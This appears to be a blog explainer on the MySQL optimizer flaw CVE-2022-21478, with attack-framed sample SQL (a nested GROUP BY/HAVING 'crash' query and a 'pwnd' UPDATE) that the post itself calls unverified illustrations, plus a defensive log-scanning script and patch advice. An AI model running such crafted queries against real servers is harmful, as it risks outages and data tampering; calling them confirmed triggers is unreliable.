The world of databases isn't immune to software vulnerabilities. One such issue that matters to anyone running Oracle MySQL Server is CVE-2022-21478. In this post, we'll break down what this vulnerability is, show the kind of query it involves, and help you understand the risks, all in straightforward language.

What is CVE-2022-21478?

CVE-2022-21478 is a vulnerability in Oracle's MySQL Server product, specifically in the Optimizer component (the part of MySQL that figures out the best way to run your SQL queries). Oracle lists MySQL 8.0.28 and prior as the affected versions; 8.0.29 is the first release that contains the fix.

The Risks

- Easily exploitable over the network: the attack needs nothing more than a normal connection to the server (AV:N, AC:L), but the attacker must already hold high privileges (PR:H), such as a DBA/root account or a role with comparably broad rights.

What Can Happen?

- Denial of Service (DoS): the attacker can hang the server or crash it repeatedly (a complete DoS), taking your site or service offline.
- Unauthorized data changes: the attacker may be able to update, insert, or delete some of the data the server holds, which means data loss or corruption.
- CVSS score: 5.5 out of 10 (Medium), with the availability impact rated High and the integrity impact Low; there is no confidentiality impact. (Details: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H)

Root Cause: Optimizer Flaw

MySQL's SQL optimizer mishandles certain crafted queries. When a sufficiently privileged user runs one of them, the server process can hang or crash, and because the crash is repeatable the attacker can keep the server down for as long as they can reconnect. Oracle also rates the flaw as allowing unauthorized update, insert, or delete access to some of the data the server holds, which is why the CVSS vector carries an integrity impact (I:L) alongside the availability impact (A:H). No confidentiality impact is listed (C:N): this is not a data-theft bug.

Exploit Details (With Example)

Disclaimer: The following information is for educational purposes only. Do NOT attempt to attack servers you do not own or have permission to test. Always update your software using vendor patches.

- MySQL 8.0.28 or earlier (unpatched)
- Attacker with high privileges (DBA/root, or a granted role with similarly broad rights)
- Network access to the MySQL server (e.g., the mysql command-line client, MySQL Workbench, or SQL scripts run through any client library)

Example Exploit Scenario

A malicious admin runs a crafted SQL query, typically built from subselects (SELECT ... FROM (SELECT ...)) or certain joins, that the optimizer mishandles, resulting in a crash or in unintended data changes.

Proof-of-Concept (POC) — Inducing a Crash

-- Let's create a test table and give the optimizer a few rows to plan over
CREATE TABLE foo_bar (id INT PRIMARY KEY, stuff VARCHAR(50));
INSERT INTO foo_bar (id, stuff) VALUES (1, 'a'), (2, 'b'), (3, 'c');

-- Now run a convoluted query of the shape described above: a derived table
-- with its own GROUP BY, regrouped again in the outer query, plus a HAVING
-- clause whose IN-subquery itself contains a scalar subquery.
SELECT *
FROM (
    SELECT x1.id AS one
    FROM foo_bar AS x1
    LEFT JOIN foo_bar AS x2 ON x2.id = x1.id
    GROUP BY x1.id
) AS crashme
GROUP BY crashme.one
HAVING COUNT(*) IN (
    SELECT COUNT(*)
    FROM foo_bar
    WHERE id > (SELECT MAX(id) FROM foo_bar)
);

-- On a server that handles this correctly the result is empty: every outer
-- group holds exactly one row (COUNT(*) = 1), while the inner subquery counts
-- rows with id greater than the maximum id (0), so 1 IN (0) is false.
-- Oracle's advisory does not publish the triggering statement, so treat this
-- as an illustration of the construct the optimizer flaw concerns, not as a
-- verified trigger.

The chain of subselects and grouping introduces edge cases for the optimizer.

- Tables with more rows and more complex structure give the optimizer more to plan per execution, and are said to make a crash more likely; they certainly make a hang more disruptive.

What Attackers Can Do

- Repeatable crash: the attacker can send the query over and over, keeping the database offline (Denial of Service).
- Data changes: embedding the same kind of subquery logic in otherwise valid UPDATE or DELETE statements (which a high-privileged account is allowed to run) extends the impact from availability to integrity.

Example for Data Tampering

-- Dangerous UPDATE driven by the same kind of nested grouping. Note the extra
-- derived table (AS picked): MySQL refuses to modify foo_bar while a subquery
-- reads foo_bar directly (error 1093, "You can't specify target table ... for
-- update in FROM clause"), so the id list has to be materialized through a
-- derived table first.
UPDATE foo_bar
SET stuff = 'pwnd'
WHERE id IN (
    SELECT picked.id
    FROM (
        SELECT MAX(x2.id) AS id
        FROM foo_bar AS x1
        LEFT JOIN foo_bar AS x2 ON x2.id = x1.id
        GROUP BY x1.id
        HAVING COUNT(*) > 1
    ) AS picked
);
-- Because id is the primary key, the self-join matches exactly one row per
-- group, so on a correctly behaving server HAVING COUNT(*) > 1 never holds
-- and no row is touched; the point is the construct, not the result.

Fixes and Prevention

Oracle fixed this bug in MySQL 8.0.29, released with the April 2022 Critical Patch Update. Users should update to 8.0.29 or later immediately.
Patch announcement:
- Oracle Critical Patch Update Advisory - April 2022

Other Resources

- NVD Entry: CVE-2022-21478
- Oracle MySQL Release Notes

Until you can patch, and as ongoing hygiene:

- Audit which accounts hold the high privileges the attack requires, and trim them; the bug is only reachable from such accounts.
- Use the MySQL general query log or slow query log to look for deeply nested GROUP BY/HAVING queries that a privileged account keeps re-sending, especially in the minutes before a crash or hang.
- Put limits on what one account or statement can do. MySQL ships two relevant controls: the max_execution_time system variable (a millisecond cap on SELECT statements, settable per session or globally) and per-account resource limits (MAX_QUERIES_PER_HOUR and related options of CREATE USER / ALTER USER). A database firewall or WAF that rejects unusually complex queries adds another layer where you have one.
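Because Oracle does not publish a trigger, log-based detection has to key on the pattern rather than a signature. The script below is an added example written for this post; it is not Oracle code and not part of any MySQL release. It reads MySQL 8.0 general-query-log text, checks the mysqld version banner against the last affected release (8.0.28), and flags deeply nested GROUP BY/HAVING statements that a high-privileged account keeps re-sending. SAMPLE_LOG is constructed for the example, and PRIVILEGED_ACCOUNTS is an assumed list that you would replace with the output of your own privilege audit.

```python
"""Log-based detection for the CVE-2022-21478 pattern (added example).

Not Oracle code. Parses MySQL 8.0 general-query-log text, checks the
version banner, and reports repeated nested GROUP BY/HAVING statements
sent by accounts on an assumed high-privilege list.
"""
import re
from collections import Counter

# Constructed sample in the MySQL 8.0 general log layout: a version banner,
# then one event per line as <timestamp>\t<conn id> <Command>\t<argument>.
SAMPLE_LOG = """\
/usr/sbin/mysqld, Version: 8.0.28 (MySQL Community Server - GPL). started with:
Tcp port: 3306  Unix socket: /var/run/mysqld/mysqld.sock
Time                 Id Command    Argument
2022-04-20T10:00:00.000000Z\t   12 Connect\troot@10.0.0.5 on appdb using TCP/IP
2022-04-20T10:00:01.000000Z\t   12 Query\tSELECT * FROM (SELECT x1.id AS one FROM foo_bar AS x1 LEFT JOIN foo_bar AS x2 ON x2.id = x1.id GROUP BY x1.id) AS t GROUP BY t.one HAVING COUNT(*) IN (SELECT COUNT(*) FROM foo_bar)
2022-04-20T10:00:02.000000Z\t   12 Query\tselect * from (select x1.id as one from foo_bar as x1 left join foo_bar as x2 on x2.id = x1.id group by x1.id) as t group by t.one having count(*) in (select count(*) from foo_bar)
2022-04-20T10:00:03.000000Z\t   13 Connect\tapp@10.0.0.9 on appdb using TCP/IP
2022-04-20T10:00:04.000000Z\t   13 Query\tSELECT id, stuff FROM foo_bar WHERE id = 42
2022-04-20T10:00:05.000000Z\t   12 Query\tSELECT * FROM (SELECT x1.id AS one FROM foo_bar AS x1 LEFT JOIN foo_bar AS x2 ON x2.id = x1.id GROUP BY x1.id) AS t GROUP BY t.one HAVING COUNT(*) IN (SELECT COUNT(*) FROM foo_bar)
"""

# Assumed: accounts your own audit found holding SUPER/ALL-style rights.
PRIVILEGED_ACCOUNTS = {"root"}
LAST_VULNERABLE = (8, 0, 28)  # Oracle: 8.0.28 and prior are affected

VERSION_RE = re.compile(r"Version:\s*(\d+)\.(\d+)\.(\d+)")
EVENT_RE = re.compile(r"^(\S+)\t\s*(\d+) (\w+)\t(.*)$")
CONNECT_RE = re.compile(r"^(\w+)@")


def server_is_affected(log_text):
    """True if the banner shows an 8.0.x release at or below 8.0.28.

    Returns None when no banner is present (cannot tell from this log).
    """
    m = VERSION_RE.search(log_text)
    if not m:
        return None
    ver = tuple(int(x) for x in m.groups())
    return ver[:2] == (8, 0) and ver <= LAST_VULNERABLE


def normalize(sql):
    """Collapse whitespace and case so re-sent copies of one query match."""
    return " ".join(sql.split()).lower()


def is_suspicious(sql):
    """Two or more subselects combined with GROUP BY and HAVING."""
    u = " ".join(sql.split()).upper()
    nested = len(re.findall(r"\(\s*SELECT\b", u))
    return nested >= 2 and "GROUP BY" in u and "HAVING" in u


def scan_general_log(log_text, privileged=PRIVILEGED_ACCOUNTS,
                     repeat_threshold=2):
    """Return one finding per (privileged user, suspicious query) pair.

    Connect events map a connection id to its user; Query events on that
    connection are attributed to the user and counted after normalization.
    """
    users = {}        # connection id -> user name
    seen = Counter()  # (user, normalized sql) -> times sent
    order = []        # first-seen order for stable output
    for line in log_text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue  # banner, header, or continuation line
        _ts, conn_id, command, arg = m.groups()
        if command == "Connect":
            cm = CONNECT_RE.match(arg)
            if cm:
                users[conn_id] = cm.group(1)
        elif command == "Query":
            user = users.get(conn_id, "?")
            if user in privileged and is_suspicious(arg):
                key = (user, normalize(arg))
                if key not in seen:
                    order.append(key)
                seen[key] += 1
    return [{"user": u, "query": q, "count": seen[(u, q)],
             "repeated": seen[(u, q)] >= repeat_threshold}
            for (u, q) in order]


if __name__ == "__main__":
    print("server affected:", server_is_affected(SAMPLE_LOG))
    for f in scan_general_log(SAMPLE_LOG):
        flag = " (repeated)" if f["repeated"] else ""
        print(f"{f['user']}: sent {f['count']}x{flag}: {f['query'][:60]}...")
```

Run it against a real general log by replacing SAMPLE_LOG with the file contents. The normalization step matters: the second sample line is the same statement in lower case, and the count of three is only reached because case and whitespace are folded before comparing. A simple app query on another connection is ignored, as is any query from an account outside the assumed privileged set.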

Summary Table

| Risk Type        | Severity | Needs Auth? | What Happens?               |
|------------------|----------|-------------|-----------------------------|
| Crash/DoS        | High     | Yes         | Server hangs/crashes        |
| Data Tampering   | Medium   | Yes         | Unauth update/insert/delete |

MySQL 8.0.28 and earlier 8.0 releases have a bug (CVE-2022-21478) in the optimizer.

- Crafted SELECT/UPDATE/DELETE queries can let a high-privileged user crash the server or tamper with data.

Fix: Patch MySQL immediately!

Want to learn more? Check Oracle’s security alert and the NVD listing.

Stay safe, patch early, and watch those admin accounts!

*Written exclusively for this post. Please share responsibly.*

Timeline

Published on: 04/19/2022 21:15:00 UTC
Last modified on: 05/02/2022 16:10:00 UTC